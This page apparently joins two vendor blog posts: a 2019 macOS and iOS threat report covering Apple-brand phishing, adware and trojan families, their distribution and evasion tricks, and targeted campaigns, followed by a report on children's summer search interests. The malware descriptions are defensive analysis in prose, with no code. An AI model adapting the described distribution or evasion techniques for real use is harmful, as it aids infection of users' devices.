Spam and phishing attacks that impersonate Apple

Among the phishing attacks faced by macOS users we would separately focus on fake web pages that mimic Apple’s official pages or simply mention the brand. Not so long ago, in 2016, there were relatively few attacks (755,000) that tried to take advantage of the brand. But in 2017 they had grown by almost 40% to exceed 1 million, and a year later they almost reached 1.5 million. We have every reason to believe that a new record will be set in 2019: during the first half of the year alone, our solutions prevented more than 1.6 million attacks, which means that by the end of the year we can expect at least twofold growth.

Number of phishing attacks using the Apple brand, 2016–2019

Let’s take a closer look at some examples of phishing pages that mimic the official Apple website. Naturally, most commonly these phishing attacks aim to steal users’ Apple IDs.

Examples of phishing pages that are designed to steal AppleIDs

Links to these sites are usually sent in emails that allegedly come from Apple Support. The recipient is threatened that their account will be locked unless they click the link and log in to confirm the information that has been specified in their profile.

Examples of phishing emails that have been sent to steal an AppleID

Another phishing trick is thank you messages for purchasing an Apple device or app on the App Store. The “client” is invited to learn more about the product (or cancel the purchase) by clicking a link that leads to a phishing page. Here, the victim is required to enter their Apple ID login and password, which, of course, will be sent to the attackers.

Fake malware attacks

Another variation on phishing web pages is malware infection detection notification pages. The design for these notifications varies. Some of them are very high quality, and they faithfully copy the design of the official Apple website. The threat of a malware infection is supposed to convince the user to call a fake support number or install a fake antivirus application that will turn a non-existent threat into a real one.

Example phishing page that provides a notification of a nonexistent infection

Malicious and unwanted programs for macOS

At the time of writing, our database contained 206,759 unique malicious and potentially unwanted files for macOS. The diagram below illustrates the growth of our database, i.e., the number of abovementioned files that were added to the database in a given year.

The number of malicious and potentially unwanted files for macOS, 2004–2019

As you can see from the diagram, up to 2011 the number of malicious files targeting macOS that were detected each year was insignificant. But then the situation changed: starting in 2012, the number of files we collected began to double year over year. However, during the first half of 2019, only 38,677 malicious and potentially unwanted objects were detected, which means that we do not expect to see a similar increase this year over 2018.

In order to identify the changes in the number of macOS users who were attacked by malware in recent years, we examined our statistics from 2012 (the time when data was first systematized) to the present. Much like in the diagram above, you can see a sharp increase in the number of users who were attacked between 2012 and 2017.

Number of unique macOS users attacked by malware, 2012 to June 2019

In order to roughly estimate how often macOS users are attacked by both malicious and unwanted software, we can look at the diagram that illustrates the number of times that Kaspersky products have detected either of the threats.

Number of times that Kaspersky products detected malware and potentially unwanted software for macOS, 2012 to June 2019

This diagram clearly shows an increase in the number of attacks that occurred in 2018. At the same time, the data for 2019 (1,820,578 attacks over the first 5 months) suggests that this year the number of attacks will decline.

Geography of attacks

In order to get an idea of the geographical distribution of threats for macOS and to determine if there are regions where users are more likely to be attacked by malicious software nowadays, we compiled a rating of countries by the share of unique users attacked in the first half of 2019, and, for the sake of comparison, in the first half of 2018.

H1 2018 H1 2019 # Country % of attacked users Country % of attacked users 1 USA 29.2% USA 24.4% 2 Germany 11.9% Germany 14.6% 3 France 8.3% France 12.4% 4 Great Britain 7.3% Great Britain 6.8% 5 Canada 4.7% Spain 5.1% 6 Russia 4.3% Japan 4.7% 7 Spain 3.8% Russia 4.6% 8 Italy 2.8% Canada 4.1% 9 Japan 2.7% Italy 4.0% 10 Brazil 2.5% Brazil 2.9%

* Kaspersky product for macOS users in the country out of all users of these products

The top three countries remained the same between 2018 and 2019: the United States came in first place (24.4%), Germany came in second (14.6%), and France came in third (12.4%).

2019 threats

Here are the TOP 10 threats for macOS that we have observed during the first half of 2019:

Verdict %* HEUR:Trojan-Downloader.OSX.Shlayer.a 21.74% not-a-virus:HEUR:AdWare.OSX.Bnodlero.q 16.34% not-a-virus:HEUR:AdWare.OSX.Spc.a 12.75% not-a-virus:HEUR:AdWare.OSX.Geonei.as 10.24% not-a-virus:AdWare.OSX.Geonei.ap 10.24% not-a-virus:HEUR:AdWare.OSX.Pirrit.j 7.78% not-a-virus:HEUR:AdWare.OSX.Pirrit.p 7.60% not-a-virus:AdWare.OSX.Agent.b 6.17% not-a-virus:HEUR:AdWare.OSX.Pirrit.o 6.00% not-a-virus:HEUR:AdWare.OSX.MacSearch.a 5.82%

* The share of unique users attacked by this malware out of all users of Kaspersky security solutions for macOS who have been attacked

With the exception of the Shlayer trojan that came in first place (more about that a little later), the rest of the top ten is filled out by various unwanted software belonging to the AdWare class. The objective of these programs, as you might guess from the name, is to display ads wherever possible: in system notifications, web page banners, search results pages, the browser, etc. This does not actively harm the user, but it definitely does not add a positive spin to using your computer.

Example of malware installed or advertised to users by some types of AdWare

Let us proceed from a general description to specific examples. The AdWare.OSX.Bnodlero family prefer to work with the browser: this software installs ad extensions, and changes the default search engine and homepage. In addition, it can download and install extra adware.

Some samples in the AdWare.OSX.Pirrit family go even further and install a proxy server on the victim’s machine to intercept traffic from the browser. There is another family that is closely connected with this one, Agent.b, since it is precisely this unwanted software that frequently downloads Pirrit. When it is not busy downloading, unpacking, and launching files, Agent.b injects JS code with advertising into the web pages that are viewed by the victim.

We would also like mention the AdWare.OSX.Cimpli family. At first glance it is no different from other adware. However, its samples behave more cunningly, and become purposely inactive if they detect an installed security solution in macOS.

When they detect these types of applications, AdWare.OSX.Cimpli family samples prefer to stay inactive

We assume that this feature was added to Cimpli in order to protect it from being listed in the databases of security software developers and, as a result, from being blocked. However, if there is a chance that the user will delete the program, then the malware will wake up and start working.

The Trojan-Downloader.OSX.Shlayer family, which heads our top ten ranking, downloads and installs various AdWare, mainly from the Bnodlero family (and this is one of the reasons why Bnodlero ranks second).

Why do we detect this particular family so often? It all has to do with how widely it is distributed: if you try to search for sites where you can watch or download a popular movie or TV series for free, the very first search results will lead to resources that request you to update Flash Player in order to view content. It is these updates that contain Shlayer.

Link to a site with Shlayer on the first search results page

Note that this technique of pushing a link to a malicious page up in the search results for certain queries is also used by distributors of other malware. Not so long ago, we studied the threats that target Game of Thrones and other popular TV series fans who wanted to download new and not yet released episodes or watch them online.

One of the websites encouraging users to download malware under the pretext of updating Flash Player

It is worth noting that from the technical point of view, Shlayer is nothing special. Its main executable file is a Bash script that consists of only four lines of code. All that it does is decrypt and run another file that it brings along with it, which in turn downloads, decrypts, and executes another file, which does exactly the same. In the end, this nesting doll of various malware installs several AdWare programs, hides them well and registers them to run at startup.

The main executable file of the Shlayer Trojan is just the outer layer of a nesting doll

Two other malware families that we encountered during the first half of the year are Trojan.OSX.Spynion and Trojan-Downloader.OSX.Vidsler. Both are far from being as popular as Shlayer, as they have been encountered by less than one percent of our users. However, each of them utilizes its own method of deceiving a potential victim, and both deserve attention.

The Trojan.OSX.Spynion trojan is distributed along with several free macOS apps, mainly from sites such as MacUpdate, VersionTracker, and Softpedia. While the app is being installed on the victim’s computer, a malicious component is downloaded and installed. The Spynion’s main objective is to monitor user activity on the network and transfer intercepted confidential data to the attackers’ servers. The trojan also has backdoor functionality, i.e., it allows attackers to remotely connect to the user’s macOS.

Trojan-Downloader.OSX.Vidsler is distributed via banner ad links, only this time under the pretext of requiring the user to update video codecs or download a new version of a video player. In terms of functionality, Vidsler is similar to Shlayer: it downloads, installs, and runs other software, most often from the FkCodec AdWare family.

Lastly, we should point out several rather dangerous trojans, which, fortunately, are not encountered very frequently in the wild. For example, the Trojan-Ransom.OSX.KeRanger family ransomware trojans encrypt all of the user’s files on the drive and demand a ransom to decrypt them. This malware is known to have been distributed through the official website of the Transmission torrent client. Another example is the Trojan-Spy.OSX.Ventir trojan, which has a complex modular architecture and contains not only a backdoor to remotely access the victim’s macOS, but also a keylogger.

MacOS and targeted attacks

Our statistics concerning threats for macOS provide fairly convincing evidence that the stories about this operating system’s complete safety are nothing more than that. However, the biggest argument against the idea that macOS (and iOS as well) is invulnerable to attack is the fact that there already have been attacks against individual users of these operating systems and groups of such users. Over the past few years, we have seen at least eight campaigns whose organizers acted on the presumption that the users of MacBook, iPhone, and other devices do not expect to encounter malware created specifically for Apple platforms.

Due to the nature of Apple’s antivirus software policy, the Kaspersky product line does not contain a security solution for iOS. Due to that we do not have statistics about threats for this operating system. However, along with malware for Android, Kaspersky researchers have also encountered malicious implants for iOS.

Next, we will provide an overview of what we consider to be the most interesting targeted attacks against the macOS and iOS platforms that we have been investigating over 2018 and 2019.

The Skygofree implant for iOS (January 2018)

Soon after the discovery of the Skygofree Android implant, Kaspersky experts found and analyzed an implant for iOS that had been developed by the same group of cybercriminals. It was discovered as a result of the analysis of the Skygofree infrastructure and consisted of several configuration files (MobileConfig) for iOS, which were used to register the device on an MDM server.

Sofacy XAgent (March 2018)

Kaspersky experts closely follow the activity of Sofacy, one of the most professional of cyber espionage groups. One of the tools at the disposal of this group is XAgent, which is a set of malware sharing a common code base, each sample individually modified to infect a specific OS, including macOS and iOS. However, the most recent detected versions of this malware for iOS date back to the end of 2014 and the beginning of 2015. This may mean that cybercriminals have (at least temporarily) lost interest in iPhones and iPads.

Bahamut-related implants for iOS and Windows (July 2018)

While studying the Skygofree iOS implant, our experts attempted to find other malware campaigns that used the results of a study of Apple’s MDM system conducted by the Intrepidus Group to compromise iOS devices. As a consequence, several servers have been discovered that presumably belong to the Bahamut group and have been active since 2017.

Operation AppleJeus (August 2018)

While investigating an attack on a cryptocurrency exchange service conducted by the Lazarus group, we discovered that the attackers sent out messages to potential victims with a link to a malicious macOS cryptocurrency trading app.

ThreatNeedle and Manuscrypt (October 2018)

In 2018, we also discovered that Manuscrypt, a piece of malware used exclusively by the Lazarus group, was engaged in suspicious activity. The new samples of this malware were noticeably different from those exposed during previous campaigns, so we gave them a new name: ThreatNeedle.

Windtail (December 2018)

Shortly after Dark Matter published its findings about the Windshift group in August 2018, we conducted our own investigation on the activities of this group. In particular, we were interested in a piece of macOS malware called Windtail.

New macOS malware from Lazarus (January 2019)

Six months after the AppleJeus operation, we discovered new Lazarus activity campaign that manifested similar symptoms: again, companies from the financial sector were hit, and again previously unknown malware for macOS was used during the attack.

New iOS implant version from FinSpy (mid 2019)

At the end of 2018, we discovered a new version of the FinSpy iOS implant in the wild, which was apparently developed during the summer of that year. This implant was part of the FinSpy Mobile product that was provided by the well-known tracking software developer.


MacOS malware has come a long way from isolated instances that existed in 2004 to hundreds of thousands of types that now exist in 2019. However, the era of explosive growth seems to be behind us, and we cannot but notice the decline in the activity of cybercriminals on this platform. However, the owners of MacBooks and iMacs have never been considered priority targets compared to Windows users, as the latter have always been much more profitable to attack simply because they were far more numerous. In addition, there is a large number of both known and not very well known exploits for Windows, which, when combined with the fact that Windows users tend to install updates irregularly, make it easier and more convenient for cybercriminals to infect Windows systems.

Another important aspect that we have discovered while preparing this report is that instead of full-fledged malware, MacBook and iMac owners increasingly receive annoying, but in most cases relatively harmless ads. It seems that this way of monetizing an infection allows attackers to make a profit and save on expenses. By contrast, it would be much more complicated and expensive to create full-fledged malware for macOS. The reasons for this are both the fact that there are fewer potential victims and the efforts that Apple is making to protect its customers.

Phishing and social engineering, which are now also on the rise, are another example of cheaper threats. The attackers continue to mainly target Apple IDs, which are the users’ key to gaining access to Apple’s infrastructure. Apple IDs are relatively easy to monetize. For example, they can be sold to other criminals. Perhaps the theft of this type of data is now the most dangerous threat macOS users face, in terms of the balance between the probability of the attack and the damage in the event of its success. Moreover, our statistics show that this type of attack is likely to be on the rise in the near future.

An extremely dangerous (but also an extremely rare) threat is a targeted attack on macOS and iOS users, mainly business users. Several well-known cybercriminal groups are currently working to develop malware for these operating systems, but the likelihood that a random user will be the target of such programs is extremely small. However, if you work in a financial institution, such as, for example, a bank, and your MacBook or iPhone is a corporate device, then the chances that you will be targeted increase considerably. In this case the threat is significant enough, so we do not recommend relying on the fact that Apple devices are in general less popular targets, and we recommend seeking out a reliable security solution. More so as we expect the number of targeted attacks on macOS and iOS devices to increase between 2019 and 2020.

To keep your devices on MacOS safe, Kaspersky recommends
  • Try to keep macOS and all of your apps up to date
  • Use only legitimate software, downloaded from official webpages or installed from Mac App Store
  • Start using a reliable security solution like Kaspersky Internet Security that delivers advanced protection on Mac, as well as on PC and mobile devices
  • Download and install apps only from the official resources such as Appstore.
  • If you need to access your iCloud, for instance to find your phone when it is lost, use only official website.
To reduce the risk for corporate MacOS users, Kaspersky recommends companies to take the following measures
  • Implement security awareness training for staff explaining how to recognize and avoid potentially malicious applications or files. For example, employees should not download and launch any apps or programs from untrusted or unknown sources.
  • Use a dedicated security products with protection for MacOS and iOS included, such as Kaspersky Endpoint Security for Business. The product empowered with cloud-based threat intelligence and machine learning technics to detect existed and new threats for different operating systems.
  • Provide your SOC team with access to the latest Threat Intelligence, which cover threats for MacOS, to keep up to date with the new and emerging tools, techniques and tactics used by threat actors.
2019. szeptember 9.

This is what our summer’s like

For the second summer straight, we cover the children’s interests during the period when they have enough leisure to give themselves full time to their hobbies. Modern children are active users of the internet, so most of their interests find reflection in their online activities, which are the subject of our today’s review.

Statistics collection principles

Kaspersky Lab products scan the content of web pages children try to access. If the website belongs to one of the fourteen unwelcome categories, the Kaspersky Security Network is alerted (no private user data is sent, so privacy is not compromised). Mark these two important points:

It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. But anonymous statistics are collected for all the 14 categories.

Data is harvested only from computers running Windows and macOS; no mobile statistics are provided in this report.

Website categorization

In the products featuring Parental Control functions web filtering is currently performed across the following categories:

Search query filtering

Children’s search activities best illustrate their interests. Kaspersky Safe Kids is able to filter kids’ queries for five different search engines: Bing, Google, Mail.ru, Yahoo! and Yandex — across six potentially risky subjects: “Adult content”, “Alcohol”, “Drugs”, “Tobacco”, “Racism” and “Profanity”.

We have grouped search queries by language. The English statistics we consider to be international, because English is such a wide spread language. We assume 100% to be the total of search queries submitted by individual users in all languages across all subjects of our interest, repetitions included. The percentage of queries says how popular a subject is.

We have split the search queries we collected from June through August 2019 into several subject categories:

  • Anonymity online
  • Alcohol, tobacco, narcotics
  • News
  • Anime
  • Memes
  • Sports
  • Celebrities
  • Education
  • Music
  • Online communication
  • Translator
  • Porn and erotic
  • Shopping
  • Computer games
  • Video
Picture of the world

This summer, children didn’t change their habits much: just like one year ago they would spend time watching YouTube videos, TV series and movies, listening to music and chatting on social networks. Much of their time was dedicated to online store browsing.

News websites drew less attention than last summer, losing 4.63 percentage points down to 6.84%. The share of porn websites somewhat decreased (by 1.21 p.p.) as well: this summer these accounted for mere 1.06% of all visited resources. Alcohol, tobacco and drugs websites have left modern children’s sphere of interests almost completely — their statistic is 0.36%.

Interestingly, the “Computer games” category has lost ground, too: from 5.33% to 1.98%. This does not mean that children have stopped to play games — quite the opposite. As explained in our annual report, children have quickly developed passion for mobile games and migrated to mobile platforms almost completely.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Parental Control module and Safe Kids product notifications across 14 categories, June — August 2019 (download)

If you look at how popular different search query subjects are, you will see that most of the time children would be looking for movies and TV series (21.93% of all queries analyzed), computer games info (18.97%), merchandise (12.91%), porn and erotic content (10.50%).

It is important to emphasize that search queries reflect exactly children’s interests, while website visits speak of how they spend time online. Thus, if we look at, say, the “Online communication” category, we shall see that it accounts for 30.41% of visits, but merely 7.20% of search queries. This is because Facebook gets listed among search queries by mistake: if you begin typing “face…” into the address bar, the browser will suggest the full URL (facebook.com), but if you ignore the suggested option, the text you type will turn into a query for the search engine.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

User search queries by subject category, June — August 2019 (download)

Software, audio, video

We have observed more than once that children take interest in video and audio content and, more than anything else, like to visit YouTube and other streaming platforms to view gaming streams or listen to music.

YouTube vs movies vs animations

YouTube is one of top choices for children. They use it to watch game walkthroughs, musical clips, lifestyle video blogs and lots of other things.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

User search queries in the “Video” category, June — August 2019 (download)

YouTube accounts for most video-related queries. Children are looking both for the service itself (“youtube” being the most popular search query, representing the same search pattern as “facebook”) and all sorts of bloggers.

This summer, other than the famous blogger PewDiePie, many kids were looking for the English-speaking beauty blogger James Charles (16,040,666 subscribers at the time of writing).

Coming up third is the professional Battle Royale (popular game genre among children) player and streamer Ninja.

Speaking of movies, children’s top-ranking queries were about Spider-Man: Far From Home, Disney’s version of Aladdin and John Wick: Chapter 3 starring the extremely popular and meme-sparking

(since 2010) Keanu Reeves.

As to TV series, children’s favorite this summer is Stranger Things, its third season released early July. They would be looking not just for the series itself, but also for info about the actors, who are of the same age as many of our young users.

The second most popular one, based on search queries, is HBO’s Chernobyl miniseries. Interestingly, with the series so popular, children have begun to dig more into radiation and all things related. We have registered queries like “radioactive”, “radon”, “radiation”, which would never have made it even into TOP 10,000 before.


This summer’s most popular streaming service — and also the top search query among kids — is Spotify. Billie Eilish, whom we have already covered in our annual report, is second in terms of search query frequency. In third place is this summer’s hit Old Town Road by Lil Nas X. The track has seen lots of remixes, has 284,202,308 views on YouTube, and is used in over 2 million videos uploaded to TikTok.

Computer games

This 2nd of August, a press release came out claiming that the number of Roblox players (active users) has exceeded 100 million, surpassing the number of Minecraft players (91 million). Interestingly, according to statistics there are more queries about Minecraft. Moreover, Fortnite turned out more popular than Roblox according to the same criterion, too. But this should not lead to conclusions about the time children spend on a particular game. Search activity may be related to attempts to clarify some gameplay processes or simply find walkthroughs.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");


Speaking of the big game industry events that got children involved this summer, we should mention Keanu Reeves’ appearance at the year’s main gaming exhibition, E3: the actor showed on stage during announcement of one of next year’s most awaited games — Cyberpunk 2077, and, as became clear from the game’s new trailer, was cast as one of the game’s NPCs. By the way, Reeves has made one of children’s top search queries among celebs this summer.

Online stores and shopping

In our annual report, we mentioned children’s heightened interest in online shopping. According to search queries, kids get more time for online stores in the summer. Thus, the “Shopping” category’s annual percentage of 8.72% has reached 12.91% over the summer. As before, amazon, ebay and aliexpress were the most popular queries. The clothes brands children were looking for the most were Vans, Gucci, Zara, H&M, as well as today’s extremely popular Off-White and Balenciaga. Speaking of electronics, the top searches were Apple and Samsung.

Online communication

The short videos format is today’s global trend in social networking, and the TikTok network (which we covered extensively in our annual report) is fully aligned with it. The network has remained popular during the summer, even overtaking SnapChat in terms of the number of subject-related search queries.

And yet Facebook is still the most popular search query for online communications. Followed by Instagram and Twitter, with TikTok, Pinterest and SnapChat bringing up the rear.

Porn and erotic

If we are to compare our annual and summer statistics, it is clear that children become less interested in pornographic content during summer vacation: 14.90% of search queries for the whole year vs 10.50% for summer. Regarding visits to porn websites from the PC, the annual figure is 2.08%, vs 1.06% in summer.

Search queries suffered basically no change over these periods. This summer, children, as before, would be searching for “porn”, “hentai”, and the porn star Mia Khalifa, who, apart from her core activity, is quite a popular blogger with almost 17 million Instagram followers.

Anime, memes, VPN and much more

Other that the global interests, we have identified a few more noteworthy subjects to be covered in this article.

Children like watching anime and, according to search queries, they do it on the website called Сrunchyroll — one of the most popular queries for “Anime”.

Speaking of the meme world, children did not fail to heed the goings on around the American Storm Area 51 event — subject of active discussions online this summer. There were also many queries concerning Grumpy Cat, who died this May, thus sparking much interest.

This summer, we also noticed children paying somewhat more attention to online privacy and anonymity. Queries about VPN, Proxy and Tor browser have made it to the top of the list. On the whole, according to our data, children’s interest for the subject is on the rise of late.


Children are well informed about what is going on in the world. Many of this summer’s big internet events got their attention. Moreover, many things are happening exactly thanks to children. Thus, the 100 million Roblox users are mostly kids. In the early days of TikTok, most of the network’s users were children and teenagers — the trend was taken up by adults only later.

Kaspersky Lab’s Safe Kids product allows parents to follow the child’s interests and stay informed about the child’s search and browsing history. We recommend using this tool as your assistant in building a relationship of trust with your child, not yet another internet filter.